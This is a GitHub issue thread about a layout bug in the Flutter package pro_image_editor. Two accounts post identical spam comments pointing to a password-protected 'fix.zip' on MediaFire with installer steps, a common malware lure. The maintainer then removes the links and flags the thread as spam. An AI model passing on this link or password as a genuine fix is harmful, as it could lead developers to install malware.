### ISSUE TITLE
[Bug]: RenderBox was not laid

### ISSUE THREAD

**Issue by LScodeblack** [hm21/pro_image_editor#201]
### Package Version

4.3.5 - any latest

### Flutter Version

  sdk: '>=2.18.4 <3.0.0'

### Platforms

Android, iOS

### How to reproduce?

`Scaffold(
      backgroundColor: Colors.black,
      body: ProImageEditor.network(
        'https://picsum.photos/id/237/2000',
        callbacks: ProImageEditorCallbacks(
          onImageEditingComplete: (Uint8List bytes) async {
            print("done");
          },
        ),
      ),
    );`

### Example code (optional)

```Dart
`Scaffold(
      backgroundColor: Colors.black,
      body: ProImageEditor.network(
        'https://picsum.photos/id/237/2000',
        callbacks: ProImageEditorCallbacks(
          onImageEditingComplete: (Uint8List bytes) async {
            print("done");
          },
        ),
      ),
    );`
```

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by hm21** [comment]
@llowvxe  @Qsgz2023ji5ban,

Sorry guys, but I have removed your comments that included download links. The link provided could potentially lead to malware or other malicious software, so to protect other users, I have also flagged the issue as `spam`.

If this was not intended as spam, please feel free to submit an issue report explaining the problem in detail, without including any download links. Additionally, it would be helpful if you could specify the version of Flutter you're using (you can find this by running flutter doctor; the version will be something like 3.24.0).

Thank you for your understanding.
